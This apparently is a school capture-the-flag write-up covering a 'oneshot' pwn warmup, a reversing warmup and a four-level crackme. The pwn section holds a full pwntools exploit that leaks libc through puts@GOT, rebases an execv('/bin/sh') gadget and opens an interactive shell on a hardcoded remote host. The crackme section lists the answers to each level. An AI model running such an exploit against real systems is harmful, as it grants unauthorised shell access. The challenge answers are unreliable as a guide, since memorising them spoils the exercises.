School contest writeup

Warmup——pwn

The first input is an address.

The program prints the content stored at that address, which gives you a leak.

Once the leak tells you where things are, the second input lets you jump to whatever address you want.

No overwrite is needed here.

The program jumps directly to the address you enter and executes it.

The catch is finding the correct offset: in the libc that was given, there are eight execv gadgets carrying /bin/sh.

Try them one by one until you find the one that works.

Exp:

```python
#!/usr/bin/env python
# encoding: utf-8
# Python 2 / pwntools exploit for the "oneshot" warmup challenge.
from pwn import *

proc_name = './oneshot'
proc_elf = ELF(proc_name)
print(proc_elf.checksec())

context.log_level = 'debug'

io = remote("59.110.6.128", 10086)
#io = process(proc_name)
#print(proc.pidof(io)[0])
raw_input('debug')  # pause here to attach a debugger when running locally

# Offsets recorded from the local libc (not used against the remote target).
local_lib_system = 0x7ffff7a53380
local_lib_printf = 0x557b0
local_lib_execv = 0x451ff
local_lib_puts = 0x6f5d0
local_lib_temp = 0x6f4e6

# Offsets from the libc given with the challenge (the one the remote uses).
lib2_sys = 0x46590
lib2_printf = 0x0000000000054340
lib2_execv = 0x00000000000C12E0
lib2_puts = 0x6fd60

# GOT / PLT entries of the binary.
got_printf = 0x600ae8
got_puts = 0x600ad8
plt_puts = 0x4004F0
plt_printf = 0x400510

# First input: an address as a decimal string; the program prints what it holds.
# Reading puts@GOT leaks the runtime address of puts in libc.
payload1 = str(got_puts)
io.recvuntil("?")
io.sendline(payload1)
io.recvuntil(":")
recvdata = io.recv()
puts_addr = recvdata[:19]
print("puts_addr " + puts_addr)
puts_addr = int(puts_addr, 16)

# The eight execv('/bin/sh') gadget offsets found in the given libc; try them one by one.
execv1 = 0x6FBDA
execv2 = 0x46483
execv3 = 0xC18D1
execv4 = 0xC1BA3
execv5 = 0xC1BF2
execv6 = 0xE4968
execv7 = 0xE5765
execv8 = 0xE66BD
# The original script left this name unset; pick one candidate and swap in the next if it fails.
execv = execv1

# Rebase the chosen gadget using the leaked puts address.
execv_addr = puts_addr + execv - lib2_puts
print("execv_addr  " + str(hex(execv_addr)))

# Second input: the address to jump to; the program jumps there directly.
payload2 = str(execv_addr)
io.sendline(payload2)
io.recvuntil("!")
io.interactive()
```

warmup——re

It's actually really easy.

Open it in IDA and see what you can find.

Then write a program according to the hint: goodgoodstudydaydayup.

Without the hint it would be hard... pure guessing...

Crackme

Analysing the four levels gives the flag.

Level one:

Simple reversing shows the answer is 2.

Level two:

This one can actually be brute-forced; the answer is 654321.

Level three:

Given merrychrismas, do the calculation with the X[] array from earlier, then reverse the resulting string and input it:

Lcont=gpfoog`q

Level four:

The flag value has to be computed from the preceding four functions.

Not difficult: compile and run it and the value comes out:

176455667

Note: run it from cmd to see the flag, because otherwise the window closes immediately.


Origin www.cnblogs.com/volva/p/11813866.html